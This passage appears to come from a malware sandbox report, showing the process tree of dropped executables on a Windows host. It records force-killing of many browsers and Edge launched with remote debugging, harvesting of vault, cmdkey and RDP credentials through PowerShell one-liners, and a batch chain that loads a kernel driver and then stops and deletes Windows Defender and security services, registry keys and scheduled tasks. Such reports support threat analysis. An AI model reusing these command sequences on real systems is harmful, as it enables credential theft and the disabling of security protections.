                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=41650 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3268,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                8⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:3792
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --no-sandbox --remote-debugging-port=41650 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3288,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3044 /prefetch:1
                                                                                                8⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:6204
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4772,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:6644
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4836,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4832 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:6648
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5480,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5476 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:7160
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5480,i,11337164543081192294,9610328411447681556,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5476 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:3592
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                                      7⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      PID:1540
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /F /IM msedge.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:6480
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM chrome.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7364
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM msedge.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7416
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM brave.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7476
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM opera.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7532
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM vivaldi.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:6744
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      "taskkill" /IM firefox.exe
                                                                                                      7⤵
                                                                                                        PID:3632
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        "taskkill" /IM dragon.exe
                                                                                                        7⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:6680
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        "taskkill" /IM maxthon.exe
                                                                                                        7⤵
                                                                                                          PID:6788
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /IM uc_browser.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7588
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /IM slimjet.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7640
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /IM cent_browser.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7696
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          "taskkill" /IM epic.exe
                                                                                                          7⤵
                                                                                                            PID:7748
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /IM torch.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:7800
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /IM whale.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:7852
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /IM 360browser.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:7916
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /IM qqbrowser.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:7980
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /IM browser.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:8032
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            "taskkill" /F /IM chrome.exe
                                                                                                            7⤵
                                                                                                              PID:8136
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM msedge.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:8184
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM brave.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:8276
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM opera.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:8400
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM vivaldi.exe
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:8452
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              "taskkill" /F /IM firefox.exe
                                                                                                              7⤵
                                                                                                                PID:8512
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM dragon.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8564
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM maxthon.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8620
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM uc_browser.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8680
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM slimjet.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8732
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM cent_browser.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8932
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM epic.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8984
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                "taskkill" /F /IM torch.exe
                                                                                                                7⤵
                                                                                                                  PID:9036
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  "taskkill" /F /IM whale.exe
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:9088
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  "taskkill" /F /IM 360browser.exe
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:9144
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  "taskkill" /F /IM qqbrowser.exe
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:9196
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  "taskkill" /F /IM browser.exe
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:9256
                                                                                                                • C:\Windows\system32\vaultcmd.exe
                                                                                                                  "vaultcmd" /list
                                                                                                                  7⤵
                                                                                                                    PID:9696
                                                                                                                  • C:\Windows\system32\cmdkey.exe
                                                                                                                    "cmdkey" /list
                                                                                                                    7⤵
                                                                                                                      PID:9740
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                                                      7⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:9788
                                                                                                                      • C:\Windows\system32\cmdkey.exe
                                                                                                                        "C:\Windows\system32\cmdkey.exe" /list
                                                                                                                        8⤵
                                                                                                                          PID:10276
                                                                                                                      • C:\Windows\system32\certutil.exe
                                                                                                                        "certutil" -store My
                                                                                                                        7⤵
                                                                                                                          PID:10352
                                                                                                                        • C:\Windows\system32\certutil.exe
                                                                                                                          "certutil" -store -user My
                                                                                                                          7⤵
                                                                                                                            PID:10564
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:10652
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Hide Artifacts: Ignore Process Interrupts
                                                                                                                            PID:11012
                                                                                                                          • C:\Windows\system32\cmdkey.exe
                                                                                                                            "cmdkey" /list
                                                                                                                            7⤵
                                                                                                                              PID:11880
                                                                                                                            • C:\Windows\system32\cmdkey.exe
                                                                                                                              "cmdkey" /list:TERMSRV/69.48.201.74
                                                                                                                              7⤵
                                                                                                                                PID:11920
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                                                7⤵
                                                                                                                                  PID:956
                                                                                                                                • C:\Windows\system32\hostname.exe
                                                                                                                                  "hostname"
                                                                                                                                  7⤵
                                                                                                                                    PID:4736
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:11168
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:11548
                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                    "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                                                    7⤵
                                                                                                                                      PID:7032
                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                      "netsh" advfirewall show allprofiles state
                                                                                                                                      7⤵
                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                      PID:6196
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:3668
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4636
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F4.tmp\8F5.tmp\8F6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                        8⤵
                                                                                                                                          PID:1204
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                                            9⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:880
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EE.tmp\9EF.tmp\9F0.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                                              10⤵
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              PID:2092
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:4532
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc start ddrver
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:4836
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 1
                                                                                                                                                11⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:1100
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc stop ddrver
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1920
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc start ddrver
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:2868
                                                                                                                                              • C:\Windows\system32\takeown.exe
                                                                                                                                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                                                11⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:2704
                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                                                11⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4780
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc stop "WinDefend"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1816
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc delete "WinDefend"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3136
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:3552
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc stop "MDCoreSvc"
                                                                                                                                                  11⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:4156
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc delete "MDCoreSvc"
                                                                                                                                                  11⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:2364
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                                                  11⤵
                                                                                                                                                    PID:1540
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    sc stop "WdNisSvc"
                                                                                                                                                    11⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:4120
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    sc delete "WdNisSvc"
                                                                                                                                                    11⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:4676
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4472
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop "Sense"
                                                                                                                                                      11⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:3536
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc delete "Sense"
                                                                                                                                                      11⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:3704
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                                                      11⤵
                                                                                                                                                        PID:1180
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc stop "wscsvc"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:3584
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc delete "wscsvc"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:3004
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                                                        11⤵
                                                                                                                                                        • Modifies security service
                                                                                                                                                        PID:4516
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc stop "SgrmBroker"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:3140
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc delete "SgrmBroker"
                                                                                                                                                        11⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:1840
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                                                        11⤵
                                                                                                                                                          PID:672
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc stop "SecurityHealthService"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:3180
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc delete "SecurityHealthService"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:3412
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                                                          11⤵
                                                                                                                                                            PID:3628
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc stop "webthreatdefsvc"
                                                                                                                                                            11⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:980
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc delete "webthreatdefsvc"
                                                                                                                                                            11⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:3592
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                                            11⤵
                                                                                                                                                              PID:4376
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc stop "webthreatdefusersvc"
                                                                                                                                                              11⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4904
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc delete "webthreatdefusersvc"
                                                                                                                                                              11⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4624
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                                              11⤵
                                                                                                                                                                PID:1784
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc stop "WdNisDrv"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:5008
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc delete "WdNisDrv"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:4636
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5064
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc stop "WdBoot"
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                  PID:4844
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc delete "WdBoot"
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                  PID:1404
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:2620
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop "WdFilter"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:1816
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc delete "WdFilter"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:4836
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:4824
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc stop "SgrmAgent"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:2892
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc delete "SgrmAgent"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:4912
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:1208
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc stop "MsSecWfp"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:1540
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc delete "MsSecWfp"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:4120
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:992
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc stop "MsSecFlt"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1916
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc delete "MsSecFlt"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:3536
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:412
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            sc stop "MsSecCore"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:3840
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            sc delete "MsSecCore"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:3188
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:1544
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:4108
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:3924
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:4416
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:4764
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc stop ddrver
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:3628
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc delete ddrver
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:1920
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413340101\9ca1fc3560.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413340101\9ca1fc3560.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
